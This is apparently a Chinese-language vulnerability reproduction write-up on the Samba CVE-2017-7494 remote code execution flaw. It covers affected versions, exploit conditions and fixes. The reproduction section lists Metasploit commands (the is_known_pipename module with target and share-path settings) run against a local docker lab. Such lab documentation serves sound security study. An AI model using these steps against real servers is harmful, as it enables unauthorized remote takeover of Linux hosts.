一、漏洞介紹
Samba實現Windows主機與Linux服務器之間的資源共享,Linux操作系統提供了Samba服務,Samba服務為兩種不同的操作系統架起了一座橋梁,使Linux系統和Windows系統之間能夠實現互相通信。samba在linux系統上實現SMB協議的服務,使用SMB協議在局域網上共享文件和打印機.CVE-2017-7494,2017年5月24日Samba發布了4.6.4版本,修復嚴重的遠程代碼執行漏洞,該漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本,可以讓惡意訪問者遠程控制受影響的Linux和Unix機器。
二、主要影響版本
1、MS17-010方程式“永恆之藍”
WannaCry勒索蠕蟲,影響Windows xp 到Windows server 2012
2、CVE-2017-7494 Linux版本“永恆之藍”遠程代碼執行漏洞
Samba 3.5.0-4.6.4/4.5.1/4.4.14中間的所有版本
三、漏洞利用條件
1、部署了存在漏洞的samba版本,並且對外網開放445端口;
2、匿名訪問用戶對共享文件有可寫權限;(權限控制很重要)
3、需要知道共享目錄的物理路徑。
四、漏洞危害及常見攻擊方式
1、獲取服務器或個人pc的權限;
2、攻擊者常使用滲透測試工具metersploit中的exp進行攻擊。
五、漏洞復現
1、復現環境:
安裝了docker的Ubuntu服務器:192.168.4.128
攻擊機(kali):192.168.4.157
2.步驟:
開啟docker環境
sudo docker-compose up -d
sudo docker ps //查看漏洞環境開啟情況
msfconsole
use use exploit/linux/samba/is_known_pipename
show options
set rhost 192.168.4.128
set SMB_FOLDER /home/share
show options
這里出現了加密錯誤,需要通過不加密來進行exploit
set SMB::AlwaysEncrypt false //設置SMB總是不加密
set SMB::ProtocolVersion 1 //設置協議版本為Version 1
exploit
六、漏洞修復建議
1、安裝ms17-010不定或升級samba版本到4.6.4
2、對外網關閉445端口